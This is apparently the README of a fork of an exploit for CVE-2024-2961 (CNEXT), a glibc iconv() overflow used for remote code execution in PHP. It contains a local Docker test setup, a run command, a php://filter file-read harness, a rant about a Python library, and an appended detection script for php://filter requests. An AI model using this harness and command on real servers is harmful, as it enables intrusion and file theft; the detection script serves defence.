Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv(), by @cfreal_
- support nixos
- add test environment
- remove the disgusting `ten` python dependency
- Enter `nix develop` and open a php environment in the `test_env` using `docker run --name php --net host -v $(pwd):/var/www/html php:7.4-apache` (or replace `php:7.4-apache` with `20a3732f422b`)
- run `python cnext-exploit.py 'http://127.0.0.1:80' 'ls /'` and you will see the result.

It is used like this:
```python
import base64
import re

import requests

from cnext_exploit import Exploit


def test_get_path(url, path: str) -> bytes | None:
    """Read a file through the test page and return its raw bytes.

    The page echoes the file after "File contents: "; requesting it through
    php://filter/convert.base64-encode keeps binary content intact.
    """
    print(f"Get path: {path}")
    path = f"php://filter/convert.base64-encode/resource={path}"
    response = requests.post(url, data={"file": path})
    result = re.search("File contents: (.*)", response.text, flags=re.S)
    if not result:
        return None
    data = result.group(1)
    return base64.b64decode(data)


def entry(url: str, command: str, sleep: int = 1, heap: str | None = None):
    # Exploit only needs a file-read primitive; the rest is its own business.
    exploit = Exploit(
        get_path=lambda path: test_get_path(url, path),
        command=command,
        sleep=sleep,
        heap=heap,
    )
    exploit.run()
```

`ten` is a useless thin wrapper of things that already exist.
- `msg_*` are just fancier `print` - but `msg_status` is different - but `failure` simply raises an exception
- `inform` is a decorator that does nothing but print text, why do we need this many ways to PRINT something?
- `@entry`: another `fire`, but using dataclasses - spoiler: then you need to write everything in a f*cking dataclass
- `tf.random.string` just joins random characters from `random.choices(string.ascii_letters + string.digits, k = length)`
- `table.split(maps, strip=True)` is just `maps.split('\n')` ignoring empty strings.
- `Path.write`: just `pathlib.Path.write_bytes` (maybe combined with `pathlib.Path.write_text`?), why not just use the default one? you know what you want to write, right?
- `logger`: renaming `logging.getLogger`, WHY? `logging.getLogger` has already existed for YEARS! WHY DO YOU WANT TO RENAME IT JUST TO MAKE IT LOOK FANCY???
- `base64.decode`: just the builtin `base64.b64decode`, YET ANOTHER RENAMING???
- `base64.encode`: just the builtin `base64.b64encode` with extra steps, it CHECKS PADDING AND RETURNS A STRING - when you want to check padding, you JUST USE `endswith`!!!!! - and this `base64` package has the same name as the builtin one in python
- and finally, `response.re.search` is just `re.search(..., response.text)`, why don't you guys want to be normal?
I removed this disgusting thin wrapper from my life, and chose solid things like the builtin library and great libraries like fire. It makes my life much easier.

PS: it uses `from ten import *` to import itself just like pwntools, which is definitely disgusting too. pwntools is for the interactive python shell and you guys are using it for writing scripts. I really feel sick about it.
The vulnerability and exploits are described in the following blogposts:

- Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1): PHP filters
- Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 2): direct `iconv()` calls, Roundcube
- To be continued...

Exploits will become available as blogposts come out.
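The `test_get_path()` helper above fetches files through a `php://filter/convert.base64-encode/resource=` path sent in the `file` POST parameter. As an added defensive example, which is not part of this repository nor of cfreal's exploit code, the script below scans request records for a `php://filter/` wrapper in query-string or body parameters, decoding a second time so that double-encoded payloads are caught as well. The `"METHOD path body"` record format and every sample request are constructed for illustration; in practice you would feed it the parameter log of a WAF or reverse proxy, since ordinary access logs do not carry POST bodies.

```python
# Added example (not part of this repository): flag requests whose parameters
# carry a php://filter stream wrapper, the pattern test_get_path() sends.
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample records in a hypothetical "METHOD path body" format;
# these are not real captures.
SAMPLE_REQUESTS = [
    "POST /index.php file=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex.php",
    "POST /index.php file=about.html",
    "GET /index.php?page=php://filter/resource=index.php",
    # double URL-encoded: a single decode still leaves %3A and %2F behind
    "GET /index.php?page=php%253A%252F%252Ffilter%252Fresource%253Dindex.php",
    "POST /upload.php name=report.pdf",
]

WRAPPER_RE = re.compile(r"php://filter/", re.IGNORECASE)


def params_of(record: str) -> dict[str, list[str]]:
    """Collect query-string and body parameters from one constructed record."""
    method, target, *body = record.split(" ", 2)
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if body:
        for name, values in parse_qs(body[0], keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    return params


def find_filter_wrapper(params: dict[str, list[str]]) -> list[tuple[str, str]]:
    """Return (parameter, decoded value) pairs that contain a php://filter wrapper."""
    hits = []
    for name, values in params.items():
        for value in values:
            decoded = unquote_plus(value)  # parse_qs decoded once; this catches a second layer
            if WRAPPER_RE.search(decoded):
                hits.append((name, decoded))
    return hits


def scan(records: list[str]) -> list[tuple[int, str, str]]:
    """Return (record index, parameter, decoded value) for every hit."""
    findings = []
    for idx, rec in enumerate(records):
        for name, decoded in find_filter_wrapper(params_of(rec)):
            findings.append((idx, name, decoded))
    return findings


if __name__ == "__main__":
    for idx, name, value in scan(SAMPLE_REQUESTS):
        print(f"record {idx}: parameter {name!r} carries a stream wrapper: {value}")
```

Run directly, it reports three of the five constructed records; `scan()` returns the same hits as `(record index, parameter, decoded value)` tuples so the check can be wired into whatever alerting you already have.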